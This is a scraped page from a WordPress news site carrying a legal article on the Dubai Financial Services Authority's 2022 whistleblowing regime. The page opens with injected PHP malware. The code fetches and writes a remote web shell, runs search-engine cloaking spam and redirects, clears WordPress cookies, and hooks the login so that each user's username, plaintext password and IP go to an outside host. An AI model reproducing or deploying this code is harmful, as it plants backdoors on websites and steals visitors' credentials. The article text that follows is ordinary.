if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <link rel="profile" href="https://gmpg.org/xfn/11"> <link rel="pingback" href="https://quantuminsan.com/xmlrpc.php"> <script type="text/javascript"> (()=>{var e={};e.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),function(n){let{ampUrl:t,isCustomizePreview:r,isAmpDevMode:o,noampQueryVarName:s,noampQueryVarValue:i,disabledStorageKey:a,mobileUserAgents:c,regexRegex:d}=n;if("undefined"==typeof sessionStorage)return;const g=new RegExp(d);if(!c.some((e=>{const n=e.match(g);return!(!n||!new RegExp(n[1],n[2]).test(navigator.userAgent))||navigator.userAgent.includes(e)})))return;e.g.addEventListener("DOMContentLoaded",(()=>{const e=document.getElementById("amp-mobile-version-switcher");if(!e)return;e.hidden=!1;const n=e.querySelector("a[href]");n&&n.addEventListener("click",(()=>{sessionStorage.removeItem(a)}))}));const u=o&&["paired-browsing-non-amp","paired-browsing-amp"].includes(window.name);if(sessionStorage.getItem(a)||r||u)return;const m=new URL(location.href),h=new URL(t);h.hash=m.hash,m.searchParams.has(s)&&i===m.searchParams.get(s)?sessionStorage.setItem(a,"1"):h.href!==m.href&&(window.stop(),location.replace(h.href))}({"ampUrl":"https:\/\/quantuminsan.com\/dubai-finance-authority-introduces-whistleblowing-regime.html?amp=1","noampQueryVarName":"noamp","noampQueryVarValue":"mobile","disabledStorageKey":"amp_mobile_redirect_disabled","mobileUserAgents":["Mobile","Android","Silk\/","Kindle","BlackBerry","Opera Mini","Opera Mobi"],"regexRegex":"^\\/((?:.|\n)+)\\/([i]*)$","isCustomizePreview":false,"isAmpDevMode":false})})(); </script> <title>Dubai Finance Authority Introduces Whistleblowing Regime – Quantuminsan

Dubai Finance Authority Introduces Whistleblowing Regime

Jolyon Davie 11 months ago

Speed Read On 7 April 2022, the Dubai Financial Services Authority (DFSA) introduced a new whistleblowing regime (the Regime). The Regime has significant parallels with that enforced in the United Kingdom by the Financial Conduct Authority (FCA), although certain of the more advanced requirements incorporated into the FCA’s regime are […]

Speed Read

  • On 7 April 2022, the Dubai Financial Services Authority (DFSA) introduced a new whistleblowing regime (the Regime).

  • The Regime has significant parallels with that enforced in the United Kingdom by the Financial Conduct Authority (FCA), although certain of the more advanced requirements incorporated into the FCA’s regime are yet to be introduced by the DFSA.

  • The Regime aims to provide better legal protection for those who report concerns within the Dubai International Financial Centre (DIFC), improve whistleblowing culture in DFSA regulated entities, encourage greater reporting (both internally and to the DFSA itself) and promote an ethical culture within the DIFC by deterring wrongdoing. It builds upon the existing framework which governs those businesses in the DIFC which fall under the supervision of the DFSA.

  • DFSA regulated firms now need to implement an appropriate whistleblowing programme (no grace period for implementation is provided by the Regime).  In focusing on the design and implementation, relevant firms would do well to consider the best practice approaches already well established within many FCA regulated institutions in the UK.

IN-DEPTH

Introduction

On 7 April 2022, changes to DIFC Regulatory Law 2004 and the DFSA Rulebook came into force, to implement proposals concerning a whistleblowing regime that were consulted on by the DFSA in 2021. The Regime applies to all entities regulated by the DFSA (Regulated Entities), which must now introduce appropriate measures.

In an accompanying press release (the Release), the DFSA noted that the aims of the Regime are to:

  1. “provide better legal protection for persons who report regulatory concerns; 

  2. improve the Whistleblowing culture in DFSA Regulated Entities and increase transparency around how those Entities will handle regulatory concerns; 

  3. encourage more disclosures of regulatory concerns; and 

  4. deter wrongdoing, promote better compliance and an ethical culture, by increasing awareness that there is a higher likelihood that wrongdoing will be reported.” 

Who Is a Whistleblower?

The Regime defines a whistleblower as any person who, in good faith, discloses a reasonable suspicion that a Regulated Entity (including its officers or employees) is, has or might have been:

  • in contravention of a provision of the law, rules or other any other legislation administered by the DFSA; or

  • engaged in money laundering, fraud, or any other financial crime.

Under the Regime, a report is made in good faith if it is made “honestly rather than for a dishonest or malicious purpose.” This would naturally exclude from the definition an individual who submits a false report, intending that, for example, it would harm a colleague with whom they had a disagreement or against whom they were competing for a promotion.

What constitutes a reasonable suspicion is dependent on the particular circumstances. However, by way of guidance, the Release notes that “while “suspicion” is a relatively low threshold, the notion of reasonableness brings an objective test to the suspicion”.  As such, a genuine and honestly held concern supported by some objective fact or evidence is likely to qualify as being reasonable, even if the suspicion is ultimately found not to be born out following investigation.

Importantly, it is for the person making the disclosure to establish that both of these tests are met to qualify for the protections offered.

Finally, for the protection of the Regime to apply, the report must be made within the Regulated Entity or externally to its auditor, the DFSA or a law enforcement agency.

What Protection Must a Whistleblower Be Given?

Where a whistleblower makes a qualifying disclosure, Article 68A(4) of the DFSA Rulebook provides that the individual (who, importantly, can remain anonymous) must not:

  • be subject to any civil or contractual liability for having made that disclosure;

  • have any contractual, civil or other remedy or right enforced against them by another person; or

  • be dismissed from their employment or be subject to any other action reasonably likely to cause detriment to them.

Should any of these events happen, the whistleblower may apply to the DIFC court for relief for any loss suffered. The DIFC court has broad discretion to make orders for relief in this regard.

One important caveat here is that the Regime does not protect a whistleblower from possible criminal liability for matters such as breach of corporate confidentiality, or from claims such as defamation, which might be brought outside of the DIFC in the local Dubai courts.

What Must Regulated Entities Do? 

The Regime requires that Regulated Entities must put in place “effective policies and procedures” that:

  • establish effective internal arrangements to allow for the disclosure of regulatory concerns, along with associated procedures to receive, assess and possibly escalate whistleblower reports within the Regulated Entity, the DFSA or any other relevant authority;

  • include reasonable measures to (i) protect the identity and confidentiality of the whistleblower; and (ii) protect them from suffering “detriment” because they raised a concern;

  • provide feedback to the whistleblower, where appropriate; and

  • include appropriate measures to deal with (i) any conflicts of interest; and (ii) to ensure the fair treatment of an individual (or individuals) accused of wrongdoing by the whistleblower.

Comparison With The FCA

The Regime largely mirrors the Senior Management Arrangements, Systems and Controls (SYSC) Rule 18 on whistleblowing, as set out in the UK FCA Handbook in respect of FCA authorised firms (Firms). It is worth noting two interesting ways in which SYSC goes beyond the Regime.

  • The FCA requires that Firms appoint a “whistleblowers’ champion”. This individual is responsible for overseeing and maintaining the integrity of a Firm’s internal arrangements concerning whistleblowing and must be both sufficiently independent and senior within the firm to carry out this role effectively.

  • SYSC provides that Firms must include a term in any settlement agreements with employees which makes clear that nothing in such an agreement prevents a worker from making a protected disclosure (as defined by the UK Employment Rights Act 1996). In addition, Firms must not request that workers enter into warranties which require them to disclose to the firm that (a) they have made a protected disclosure; or (b) they know of no information which could form the basis of a protected disclosure.

The DFSA is due to conduct a review of the Regime in mid-2023 which may result in further measures being introduced, such as those described above. In the meantime, Regulated Entities who are seeking to implement best practice might consider adopting one, or both, of these approaches.

Brief Comment

Given the complexity of certain aspects of the Regime (e.g. whether a disclosure will qualify as being made in good faith and based upon a reasonable suspicion, whether the whistleblower might risk criminal or other proceedings, notwithstanding the protection offered by the Regime, etc), Regulated Entities might consider making free, independent legal advice available to their staff, as part of their whistleblowing policies.  Consideration should also be given to setting up dedicated hotlines, staffed by properly trained and sufficiently senior internal staff, who speak multiple languages, or utilising the services of an external provider (subject again to other relevant laws in Dubai and the DIFC).

For Regulated Entities with a nexus to the UK (and which are therefore likely to be within the reach of the UK Bribery Act 2010), a comprehensive whistleblowing programme is a key part of a control framework designed to ensure that an organisation has in place ‘adequate procedures’ designed to prevent bribery.  The introduction of the Regime therefore offers a useful occasion on which such entities might review and refresh their broader anti-bribery control framework more generally.

The Chief Executive of the DFSA noted in a statement that: “[the DFSA] expect all Regulated Entities to be ready to discuss and demonstrate the application of their policies and procedures when engaging with the DFSA.”  As with all compliance processes, proper documentation and record keeping, training to help new policies and procedures embed within an organisation and evidence of ongoing monitoring and review are key to satisfying a regulator of genuine and proactive compliance.

The Release notes that the procedures established by Regulated Entities should be “appropriate to the nature, scale and complexity of that Entity’s business and must be reviewed periodically to ensure they are adequate, effective and up to date.”  This is important, as it permits an approach proportionate to the size and complexity of the business.  As such, whilst well established international financial institutions will be expected to have comprehensive and sophisticated processes in place, smaller or more recently established companies could justifiably take a less comprehensive approach.

Along with the recent establishment of a specialist court in Dubai to hear cases relating to money laundering and financial crime, the introduction of the Regime is a further example of ongoing efforts to promote Dubai as a leading jurisdiction in which to do business, by encouraging sophisticated governance and compliance processes amongst businesses in Dubai, tackling financial crime and enhancing the integrity generally of the UAE’s financial system.

https://www.natlawreview.com/article/new-whistleblowing-regime-introduced-dubai-financial-services-authority

Jolyon Davie

Next Post

Germany Industry CEOs Meet With Scholz as Russia Pressure Mounts

Sat Apr 16 , 2022
(Bloomberg) — Chieftains of German industry including the heads of Deutsche Bank AG, Mercedes-Benz AG and Siemens AG have met with Chancellor Olaf Scholz on Tuesday amid growing concern over fallout from sanctions targeting Russian energy supplies. Most Read from Bloomberg While backing the sanctions introduced against Russia, the German […]

You May Like

Copyright @quantuminsan.com Theme: Default Mag by ThemeInWP
CookieDurationDescription
cookielawinfo-checkbox-analytics11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional11 monthsThe cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
